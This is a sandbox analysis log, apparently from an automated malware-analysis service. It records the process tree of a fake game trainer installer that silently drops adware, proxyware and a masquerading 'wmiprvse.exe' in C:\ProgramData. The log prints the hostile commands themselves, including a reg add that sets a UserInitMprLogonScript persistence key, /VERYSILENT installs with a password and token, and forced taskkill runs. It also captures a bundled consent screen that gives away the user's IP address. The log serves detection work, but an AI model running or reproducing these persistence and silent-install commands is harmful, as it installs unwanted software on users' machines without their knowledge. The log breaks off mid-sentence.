                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi" AI_SETUPEXEPATH="C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe" SETUPEXEDIR="C:\ProgramData\AW Manager\Windows Manager\updates\v113\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 "
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50B63A94597415634C568616DD551356 E Global\MSI0000
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                                  Source: unknownProcess created: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\ZmWSzgevgt.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp "C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp" /SL5="$20408,832512,832512,C:\Users\user\Desktop\ZmWSzgevgt.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp "C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp" /SL5="$1047E,4289520,832512,C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe "C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe" /qn CAMPAIGN="2598Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpProcess created: unknown unknownJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp "C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp" /SL5="$204E6,10235147,832512,C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* %ProgramData%Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /fJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* C:\ProgramDataJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /fJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1944,i,7293326498590966015,15724221701917447522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Johan.msi" /qn CAMPAIGN=2598 AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 /qn CAMPAIGN=""2598"" " CAMPAIGN="2598
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7B2098DE867FDA1FBAC9E94E8D311FE9 C
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB3F137362C364F2A010C44D44B9B692
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A0F7B99CF6F59695615DF13CC6461763 E Global\MSI0000
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9A415338A0E06E3AA66F7530B5FE606F C
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 50B63A94597415634C568616DD551356 E Global\MSI0000
                                  Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeProcess created: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" /install silentall "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.ini
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe "C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe"
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi" AI_SETUPEXEPATH="C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe" SETUPEXEDIR="C:\ProgramData\AW Manager\Windows Manager\updates\v113\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 "
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeFile written: C:\Users\user\AppData\Local\AdvinstAnalytics\57bec79515c1ec525f8858bf\1.0.0\tracking.ini
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpWindow found: window name: TMainFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: I accept the agreement
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpWindow detected: License AgreementPlease read the following important information before continuing.Please read the following License Agreement. You must accept the terms of this agreement before continuing with the installation.Welcome this is an important message and license agreement so please read all below carefully. river-city-rival-showdown-trainer-15-v1-8-.exe is financed by advertisement. By clicking Accept you will continue with the installation of river-city-rival-showdown-trainer-15-v1-8-.exe and the offers listed below.Inlog Browser is fast and secure web browser which does not collect your usage data.By clicking "Accept" I agree to the HYPERLINK "https://www.inlogbrowser.com/eula.txt"EULA HYPERLINK "https://www.inlogbrowser.com/pp.txt"Privacy Policy and consent to install Inlog Browser. This program can be removed at anytime in Windows Add/Remove Programs.your PC run like its brand new! Install Windows Manager the best utility for windows! Accept the HYPERLINK "https://advancedmanager.io/eula"EULA and HYPERLINK "https://advancedmanager.io/privacy-policy"Privacy Policy by pressing "Agree". A proxy service to protect your privacy. Accept the HYPERLINK "https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c4d0f3fabe"EULA by pressing "Agree". Optimized search feeds. By clicking "Accept" I agree to the HYPERLINK "http://www.thedownloadplanet.com/termsofuse"EULA and consent to install.an unparalleled gaming and browsing experience on mobile and desktop with OperaGX. Set limits on CPU RAM and Network usage use Discord & Twitch from the sidebar and connect mobile and desktop browsers with the file-sharing Flow feature. By clicking "Accept" I agree to the HYPERLINK "https://legal.opera.com/eula/computers/"EULA HYPERLINK "https://legal.opera.com/privacy/"Privacy Policy and consent to install.- Build a better digital experience with data-driven resultsLet us help your business optimize its performance perform more efficiently and maximize profit to make more strategically-guided decisions. By clicking "Accept" I agree to the HYPERLINK "https://staranalytics.io/EULA.html"EULA and consent to install.proceeding with the installation you agree to the HYPERLINK "https://digitalpulsedata.com/tos"EULA grant Digital Pulse permission to occasionally utilize the available resources of your device and IP address to retrieve public web data from the Internet. Digital Pulse highly regards your trust and prioritizes safeguarding your privacy and personal data. To ensure your safety Digital Pulse comprehends the security implications involved in sharing your IP address and diligently monitors all network traffic. Your IP address will solely be used for authorized business purposes and never for unauthorized ones. Rest assured that none of your personal information will be accessed or collected except for your IP address. This is a strict policy.I &accept the agreementI &do not accept the agreement&NextCancel
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpWindow detected: License AgreementPlease read the following important information before continuing.Please read the following License Agreement. You must accept the terms of this agreement before continuing with the installation.Welcome this is an important message and license agreement so please read all below carefully. river-city-rival-showdown-trainer-15-v1-8-.exe is financed by advertisement. By clicking Accept you will continue with the installation of river-city-rival-showdown-trainer-15-v1-8-.exe and the offers listed below.Inlog Browser is fast and secure web browser which does not collect your usage data.By clicking "Accept" I agree to the HYPERLINK "https://www.inlogbrowser.com/eula.txt"EULA HYPERLINK "https://www.inlogbrowser.com/pp.txt"Privacy Policy and consent to install Inlog Browser. This program can be removed at anytime in Windows Add/Remove Programs.your PC run like its brand new! Install Windows Manager the best utility for windows! Accept the HYPERLINK "https://advancedmanager.io/eula"EULA and HYPERLINK "https://advancedmanager.io/privacy-policy"Privacy Policy by pressing "Agree". A proxy service to protect your privacy. Accept the HYPERLINK "https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c4d0f3fabe"EULA by pressing "Agree". Optimized search feeds. By clicking "Accept" I agree to the HYPERLINK "http://www.thedownloadplanet.com/termsofuse"EULA and consent to install.an unparalleled gaming and browsing experience on mobile and desktop with OperaGX. Set limits on CPU RAM and Network usage use Discord & Twitch from the sidebar and connect mobile and desktop browsers with the file-sharing Flow feature. By clicking 